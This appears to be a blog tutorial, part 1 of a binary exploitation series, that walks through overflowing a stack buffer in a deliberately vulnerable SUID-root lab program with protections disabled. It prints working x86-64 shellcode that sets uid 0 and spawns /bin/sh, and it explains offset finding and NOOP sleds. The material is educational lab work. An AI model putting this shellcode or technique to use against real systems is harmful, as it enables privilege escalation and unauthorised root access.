Adventures in Binary Exploitation: Part 1

In the introduction we looked at some crappy code, looked at how we were going to attack it and discussed the various mitigations in place to try and stop us. Which we promptly disabled because we are n00bs.

In this part we're going to install some useful new tools first. If you're on Kali Linux you may have some of these already and should fully update your installation. In fact, everyone else go do that anyway.

Next we'll install some specific things:

Gdb-peda - a python-based addon for the ubiquitous gdb debugger, something we'll be using a lot. It has some ace tools to help with exploitation and reverse engineering of binaries.
Pwntools - a python library to assist in exploit development and reverse engineering that provides helpful wrappers to commonly used code

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

Pwntools is available via a few methods - more information on downloading and installing it can be found here.

Before we start, we need to change the attributes of our binary by changing the owner to root and setting the SUID bit. The SUID bit is what makes commands like passwd able to run as a normal-level user while changing root-owned data. Exploiting a remote service running in that way would be a good thing... There's also the SGID bit as well, but we're not going to do anything with that here.

chown root ./part1
chmod u+s ./part1

Time to play!

Let's run our app and see what we can do. The first thing you've probably figured out is that we're gonna put in a bunch of characters and see what happens. Let's go for 200 characters. We can do this pretty simply with python on the command line, followed by piping the output into our vulnerable app.

Boom, a seg fault - this is good. Something went wrong with our program and it crashed. We can use gdb to find out why. The peda addon makes this easier as it displays a bunch of useful information in a very nice format. It shows us the stack and all of the registers. It also shows us where the program execution was broken and the instructions around it. I re-ran the above command and used the > redirector to send the A characters to a file. I then loaded gdb and ran the program inside it with the "r" command, sending the file as the input with the < redirector.

0x4141414141414141 eh? And lots of mentions of "A" characters all over the place. It looks like the crash occured at the return instruction at the end of vuln(). The return instruction (via code elsewhere) reads the address from the stack (the current position of the stack pointer - %rsp - is where the CPU is looking to put data on or read data off the stack) and puts it into the %rip register. The %rip register holds the instruction pointer - the next address to be executed. All of those 41s just so happen to be the hex equivalent of A in ASCII - the character we used in our input. That location doesn't exist as a readable location so the CPU shits a brick and kills execution.

It’s also worth noting that the specific reason for the segfault is more than just a memory location that is unreadable, although that would certainly cause a segfault normally. We’ve actually specified an address higher than the highest possible address on a 64 bit system. So it’s doubly bad.

It would be nice to know how many As we need to write until we're overwriting the area that is read into %rip. If we did that we could put in our own address... then the sky's the limit! Let's use a great feature of peda - the pattern functions (based on work for the Metasploit project). We'll make the pattern (200 characters again) and direct it out to a text file, and then rerun the program in gdb with our pattern fed in as the input.

Now the execution has failed with what looks like our pattern of characters in the %rsp register. We're looking at the stack from the current position pointed to by %rsp, then going upwards towards higher memory addresses. Let's see if we can locate that string of characters at the top of the stack and find out how many bytes into the buffer it is. PEDA makes this easy.

We can see that it takes 104 bytes before we reach the bit read in as a return address. The system is running in little endian mode, meaning we need to provide the least significant bytes first - essentially putting our address in reverse. Different CPUs read things from memory in a different order - I don't know why and frankly I don't care. Not my area of expertise. Luckily pwntools can do this for us, as we'll see later in the code.

Based on what we covered in the introduction we'll be making the return address point to the start of our user input. We control it, so we could put our own code in there, and the stack is executable because we turned off NX. The typical thing to do is to give ourselves a shell with root permissions. Then we've won the game and we can do anything else. Let's check where the start of our buffer is.

First, we'll set a "breakpoint" - the most basic feature of a debugger really. This allows us to temporarily pause execution at a place of our choosing so that we can inspect the CPU and memory states. Then we’ll run the program with some proper input so that we can see how things run normally and where the entered string gets stored. Using the "find" command to look for our string.

There’s the address of our buffer in the stack - 0x7fffffffe4a0 - clear as day.

Now we need something to put in there. I don't really want to go into writing shellcode right now, so we'll go and grab something from the internet that sets the current uid to 0 for root (sometimes that's needed and running an executable without doing it only gives a normal user shell in my experience - on your system you may not have to do that) and then calls the /bin/sh executable with a syscall. If you have a look at that page you'll see how we're preparing the various CPU registers with the parameters needed for the syscall to call our shell.

We also need to know the length of the shellcode so that we can subtract it from 104. The remainder of the filler up to the return address doesn’t matter. We can stick with the As for now. We could also use the hex value 90, which corresponds to the NOOP assembler command - No Operation - which literally does nothing. The link to the shellcode lists the length of the code as 48 bytes, leaving us a padding length of 56 bytes.

Recon done. Now: the exploit.

\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62
\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31
\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c
\x58\x0f\x05

You'll see that there's some odd characters being used to build up the shellcode. That's because we're no longer entering typeable-ASCII characters here. These are raw hex codes. You can find a table here if you want to have a look. The characters are read as single byte values that are correspond to commands that the CPU can run - known as opcodes. This isn't the time to go into those - this isn't an ASM tutorial. The \ is an escape character - essentially don't read this as input. The x means read the next two characters as a hex byte value to determine the character. There's no way we could type those in with a keyboard.

Now that we have our return address and some shellcode it's time to actually put something together and test it out. This is where pwntools comes in. We'll use some simple operations to build up our buffer bit-by-bit, then run the process, and then send it our input. Addresses are converted to 64-bit little endian and entered into the buffer at the correct place. Finally we can make our script write the input to a file that we can feed into the program when we run it inside gdb.

Calling this inside gdb gives us... a shell! Which then promptly fucks off. We can’t really interact with it inside gdb, so we need to get our exploit running outside gdb. If we change the bottom part of our exploit to the following we can send the payload to our executable and enable two-way communication over stdin and stdout with some more useful pwntools functions. Let’s give it a go:

Balls! It didn’t work! This confused me for the longest time. A Google search revealed the answer. When you run code inside gdb some environment variables get set which are placed onto the beginning (read: higher memory addresses) of the stack, changing our buffer location and making our exploit fail outside of gdb. How much of a difference can vary by system, so we’ll need to bypass this issue in an elegant way that works on as many systems as possible.

This is where NOOP sleds come in. From my search it seems that the difference can be as small as a 40 bytes and as large as 96 bytes. We’ll need to find some way to avoid our return address pointing to somewhere we didn’t intend to and instead point towards something that will get us to the shellcode.

What if we were to add a bunch of NOOPs to the start of our buffer and try adjusting the return address? Remember: the address will be higher than we think because there’s no extra stuff inserted by gdb at the start of the stack. If we keep increasing it we will eventually hit our NOOP sled and slide allllllll the way to the start of our shellcode. Nice!

This way we can be more imprecise with our return address - we just have to hit one of the NOOPs randomly. However, the length of our shellcode plus the NOOP sled and any padding required obviously can’t be larger than 104 bytes, or we’ll be unable to overwrite the return address.

Using NOOPs is also good because they only take up a single byte. You don’t have to try and predict the address of a longer instruction and then accidentally land half way through, possibly causing a crash. By hardening your exploit against many problems like this you can ensure that it runs on more variations of system - which is always nice.

At first I was tempted to use the maximum possible padding, but when testing inside gdb it seemed that the end of my shellcode got overwritten somehow. Weird, canaries are turned off. Maybe something else is doing it. Edit: I think it’s the result of the read() call being stored on the stack? Whatever, lets take off some NOOPs, move the shellcode back, and add some padding back to get us to the return address location properly. We’ll adjust the return address forward by 48 bytes.

Bang! We're in! Later checking by changing the return address lots and re-running a few times revealed that the offset was exactly 32 bytes. A bit annoying at the end there, but we’ve learnt some useful things. Feels pretty good, doesn't it? Well, we're gonna start turning protections on one at a time to see what we can do. Strap in.

Link: Part 2

ElMarko says things